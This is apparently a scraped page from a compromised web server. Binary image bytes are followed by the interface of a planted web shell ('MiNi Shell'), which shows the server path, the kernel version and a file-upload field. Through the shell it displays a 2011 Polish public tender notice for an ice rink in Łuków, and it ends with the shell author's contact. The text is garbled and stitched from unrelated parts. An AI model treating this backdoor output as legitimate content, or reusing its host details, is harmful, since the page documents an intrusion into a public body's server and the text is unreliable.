JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111020/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111020/345272-N-2011.html

<p class="kh_header"><b>Łuków: Instalowanie składanego lodowiska sezonowego Biały Orlik przy Szkole Podstawowej Nr 4, Gimnazjum Nr 1 w Łukowie.</b><br>
<b>Numer ogłoszenia: 345272 - 2011; data zamieszczenia: 20.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łuków , ul. Piłsudskiego 17, 21-400 Łuków, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lukow.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Instalowanie składanego lodowiska sezonowego Biały Orlik przy Szkole Podstawowej Nr 4, Gimnazjum Nr 1 w Łukowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia:
Dostawa sezonowego składanego lodowiska z montażem na istniejącym boisku wielofunkcyjnym                       o nawierzchni poliuretanowej w ramach zadania inwestycyjnego, pn.: Instalowanie składanego lodowiska sezonowego Biały Orlik przy Szkole Podstawowej Nr 4, Gimnazjum Nr 1 w Łukowie.

1.1 Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest dostawa fabrycznie nowego sztucznego lodowiska o powierzchni (netto) pomiędzy bandami - 495 m2 wraz z jego jednokrotnym montażem i posezonowym jednokrotnym demontażem i uruchomieniem na istniejącym boisku wielofunkcyjnym wybudowanym w ramach programu Moje Boisko - ORLIK 2012
Dane techniczne lodowiska i jego elementów:
1)	Kompaktowy agregat chłodniczy o wydajności chłodniczej dla 34% roztworu glikolu etylenowego
-11/-8°C na poziomie min. 125 kW dla systemu ziębniczego na bazie mat z EPDM, o poziomie mocy
akustycznej na poziomie max.65 dB(A)  (pomiar ciśnienia akustycznego w odległości 10 m od
agregatu), charakteryzujący się następującymi cechami:
-współczynnik wydajności agregatu w trybie chłodzenia na poziomie min. COP-3,20 (współczynnik
określający stosunek mocy chłodniczej do mocy pobieranej przez urządzenie),
-agregat musi być wyposażony w pełen roboczy wsad czynnika na bazie freonu, dopuszczonego do stosowania i posiadającego wszelkie niezbędne atesty i zezwolenia na stosowanie,
-agregat musi posiadać min. dwa obiegi chłodnicze a każdy obwód chłodniczy musi być wyposażony
w przetwornik wysokiego i niskiego ciśnienia,
-agregat zapewniający min. czterostopniową regulację pracy w zakresie 25, 50, 75 i 100%,
-agregat musi posiadać zintegrowany (w jednej zabudowie) moduł hydrauliczny - pompa i naczynie
rozszerzalne, elektroniczny wyłącznik przepływu, zawory odcinające i wyrównawcze, filtr wodny,
przyłącze umożliwiające pomiar spadku ciśnienia parownika oraz pomiar dostępnego ciśnienia, zawór nadmiarowy dostosowany do instalacji,
-agregat musi posiadać wewnętrzny, izolowany zbiornik buforowy o pojemności min. 350l.
-panel elektryczny agregatu musi być odporny na wpływy atmosferyczne i musi być wyposażony w
dostęp rewizyjny,
-agregat musi być wyposażony w mikroprocesorowy moduł sterujący umożliwiający wyświetlanie m.in. informacji i kontrolę temperatury i ciśnienia czynnika chłodniczego, dane diagnostyczne, harmonogram włączania i wyłączania, zabezpieczenie przed zamarznięciem parownika, monitorowanie wartości zadanych glikolowi, temperaturę powietrza otoczenia, działania  wentylatorów, pomp i sprężarek.

Agregat chłodniczy, modułowy system ziębniczy, bandy lodowiskowe  muszą być oznakowane znakiem CE  lub znakiem budowlanym zgodnie z art. 5 ust. 1 ustawy z dn. 16.04.2004 r. o wyborach budowlanym ( Dz.U. Nr 92, poz. 881 z późn. zm. ).

2)	Modułowy system ziębniczy tafli lodowiska charakteryzujący się następującymi cechami:
-długość pojedynczego modułu - 2,5 m,
-kolektory zasilające system pracujące w układzie Tichelmana, zabudowane w sztywnej ramie
stalowej, obudowanej blachą celem zabezpieczenia przed osobami niepowołanymi,
-odległość (podziałka) pomiędzy osiami sąsiednich przewodów ziębniczych max 20 mm,
-przewody ziębnicze wykonane z gumy EPDM zapewniającej równe układanie na powierzchni (bez
falowania) i umożliwiające posezonowe zwijanie w kręgi o średnicy do 1,0 m,
-połączenia rur kolektorów poszczególnych modułów za pomocą szybko - złącza zapewniającego szybki montaż i demontaż oraz szczelność połączenia.
3)	Bandy lodowiska o wysokości ok. 1,1 - 1,2 m wyposażone w dwie bramki we/wy charakteryzujący się następującymi cechami:
-konstrukcja band wykonana ze stali cynkowanej ogniowo z wypełnieniem z płyt PEHD o gr. min.
8 mm w kolorze białym,
-bandy wyposażone w dolną listwę okopową wykonaną z PEHD o gr. min. 10 mm w kolorze żółtym
do wys. 20 cm oraz górne pochwyty wykonane z PE o gr. min. 10 mm w kolorze niebieskim lub
czerwonym. Promień w narożnikach bandy nie mniejszy niż 3,8 m.
Ponadto w ramach dostawy lodowiska dostawca winien:
-przygotować podłoże płyty boiska wielofunkcyjnego o nawierzchni poliuretanowej poprzez ułożenie
pod lodowisko oraz kolektory zasilające, folii PE o gr. min. 0, 5mm, płyt OSB o gr. min. 15 mm,
-wykonać podłączenie elektryczne odbiorników do istniejącej rozdzielni elektrycznej o mocy minimalnej ok. 60kW i zabezpieczeniu 125A posadowionej w odległości do 10 m od miejsca
lokalizacji agregatu chłodniczego,
-napełnić instalację 34% roztworem glikolu etylenowego w ilości niezbędnej dla prawidłowej pracy
układu,
-dostarczyć odpowiednią ilość pojemników do magazynowania glikolu po zakończeniu sezonu 
wraz z przenośną pompą oraz osprzętem do wypompowywania po sezonie glikolu z instalacji,
-dostarczyć i ułożyć maty gumowe do chodzenia na łyżwach o szerokości min.2m, długości 50 m.
Wykonawca  zobowiązany jest wykonać pierwszy montaż i demontaż oraz rozruch instalacji, wytworzenie tafli lodu o gr, ok.5 cm oraz zapewnienia wyszkolenia pracowników Zamawiającego w zakresie użytkowania oraz  montażu i demontażu lodowiska.

Wykonawca zobowiązuje się na czas trwania gwarancji do nieodpłatnego wykonywania przeglądów              i  usuwania zgłaszanych przez zamawiającego usterek. Przeglądy obejmować będą czynności niezbędne do zapewnienia prawidłowej pracy sprzętu -nie rzadziej niż raz  w roku.  W przypadku wystąpienia konieczności naprawy sprzętu poza miejscem określonym w § 4 niniejszej umowy, wykonawca zapewni:
- odbiór na własny koszt wadliwego sprzętu w terminie nieprzekraczającym 2 dni roboczych;
- dostawę naprawionego sprzętu na własny koszt, w terminie nieprzekraczającym 2 dni roboczych od dnia usunięcia awarii przez serwis, a w uzasadnionych przypadkach  w terminie nie dłuższym niż 5 dni roboczych od dnia odebrania sprzętu z miejsca określonego w  § 4 niniejszej umowy.
- W przypadku braku możliwości usunięcia awarii w terminie 5 dni roboczych  od dnia odebrania wadliwego sprzętu wykonawca zobowiązuje się do bezpłatnego dostarczenia  i uruchomienia nowego sprzętu zastępczego o parametrach równoważnych   z oferowanymi.
Wykonawca zobowiązuje się do podjęcia czynności serwisowych w czasie nieprzekraczającym jednego dnia roboczego od momentu zgłoszenia.
Wykonawca zapewni dostęp do pomocy technicznej, umożliwiającej zgłaszanie wad i usterek za pomocą Internetu lub telefonicznie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.31-4, 42.51.30.00-5, 19.51.00.00-4, 24.32.23.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 10 000,00 PLN (słownie: dziesięć  tysięcy złotych).
2.	Wadium musi być wniesione przed upływem terminu do składania ofert.
3.	Wadium może być wniesione w: 
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo                       - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust 5 pkt. 2 ustawy
    z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
         Nr 109, poz. 1158, z późn zm.).
4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: BANK PEKAO S.A. Nr 51 1240 2698 1111 0010 2632 9540;  z dopiskiem: Wadium na Instalowanie składanego lodowiska sezonowego Biały Orlik.
5.	W terminie składania ofert na rachunku Zamawiającego muszą znaleźć się pieniądze przelane tytułem wadium. Do oferty należy dołączyć kserokopię polecenia przelewu. 
6.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i powinna zawierać następujące elementy:
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazania ich siedzib i daty zawarcia umowy;
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją;
3)	kwotę gwarancji;
4)	termin ważności gwarancji;
5)	nieodwołalne i bezwarunkowe zobowiązania gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego w przypadku gdy Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie;
- nie wniósł zabezpieczenia należytego wykonania umowy;
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
- w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3 P.z.p. nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 P.z.p. lub pełnomocnictw, chyba, że udowodni, że wynika  to z przyczyn nieleżących po jego stronie.
7.	Postanowienia ust. 6 stosuje się również do poręczeń, określonych w ust. 3 pkt 2 i 5.
8.	W przypadku wniesienia wadium w formie innej niż w pieniądzu należy złożyć oryginał dokumentu potwierdzającego wniesienie wadium w ofercie. Wykonawca załącza do oferty oryginał dokumentu potwierdzającego wniesienie wadium w sposób uniemożliwiający jego zaginięcie, pozwalający jednak na jego zwrot bez dekompletowania oferty - oryginał nie może być na trwale zespolony z ofertą. W przypadku niezastosowania się do powyższego zwrot oryginału będzie niemożliwy.
9.	Wadium wnoszone w formie niepieniężnej powinno zachować ważność od dnia składania ofert do upływu terminu związania ofertą.
10.	Wykonawca, którego oferta nie będzie zabezpieczona wymienioną wyżej formą wadium zostanie przez Zamawiającego wykluczony z postępowania o udzielenie zamówienia publicznego.

11.	Zamawiający dokona zwrotu wadium zgodnie z warunkami określonymi w art. 46 ustawy Prawo Zamówień  Publicznych.
Zamawiający zatrzymuje wadium wraz z odsetkami w sytuacjach określonych w art. 46 ust. 4a i ust.5 ustawy Prawo Zamówień Publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi metodą warunku granicznego - spełnia/niespełna. 
Warunek graniczny spełniają - wykonawcy którzy wykonali w ciągu ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej  jedną dostawę wraz z montażem sztucznego lodowiska składanego lub stałego o wartości nie mniejszej niż 300 000,00 PLN brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionych poniżej, z uwzględnieniem warunków ich wprowadzenia:
1.	Zmiana terminu realizacji przedmiotu umowy:
1)	zmiany spowodowane warunkami atmosferycznymi:
a)	warunki atmosferyczne uniemożliwiające prowadzenie robót , przeprowadzanie prób i   sprawdzeń, dokonywanie odbiorów ( silne mrozy poniżej -30oC, opady powyżej 200 mm/mies.)
b)	siły wyższej.
2)	zmiany będące następstwem okoliczności leżących po stronie zamawiającego:
a)	wstrzymanie robót przez zamawiającego,
3)	konieczność wykonania robót dodatkowych.
4)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycji. 
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania jej przedmiotu  w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
2.	Pozostałe zmiany:
Rezygnacja przez zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku  z wynikającymi z umowy świadczeniami,
3.	Siła wyższa jest to zdarzenie, którego strony nie mogły przewidzieć, któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia wykonawcy wykonanie w części lub w całości jego zobowiązań.
Siła wyższa obejmuje w szczególności, następujące zdarzenia:
a)	wojna, działania wojenne, działania wrogów zewnętrznych; 
b)	terroryzm, rewolucja, przewrót wojskowy lub cywilny, wojna domowa;
c)	skutki zastosowania amunicji wojskowej, materiałów wybuchowych, skażenie radioaktywne, z wyjątkiem tych które mogą być spowodowane użyciem ich przez wykonawcę;
d)	klęski żywiołowe, jak huragany, powodzie, trzęsienie ziemi;
e)	bunty, niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy wykonawcy i jego podwykonawców.
Jeżeli wykonanie umowy jest niemożliwe z powodu wydarzenia stanowiącego działanie siły wyższej zdefiniowanej to zamawiający zaświadczy, że wykonanie umowy nie jest możliwe. Wykonawca, po otrzymaniu takiego świadectwa, tak szybko jak to możliwe zabezpieczy teren budowy i wstrzyma roboty, a zamawiający zapłaci wynagrodzenie za całość robót wykonanych przed otrzymaniem takiego świadectwa.
W przedstawionych zdarzeniach w przypadku wystąpienia opóźnień strony ustalą nowe terminy realizacji z tym, że minimalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy lub postoju</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lukow.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD MIASTA ŁUKÓW UL. PIŁSUDSKIEGO 17, 21-400 ŁUKÓW POK. 15 W GODZ. 7:30 - 15:30 OD PONIEDZIAŁKU DO PIĄTKU.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2011 godzina 11:30, miejsce: URZĄD MIASTA ŁUKÓW UL. PIŁSUDSKIEGO 17, 21-400 ŁUKÓW POK. 109 SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków budżetu państwa w ramach programu rządowego budowy lodowisk BIAŁY ORLIK..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com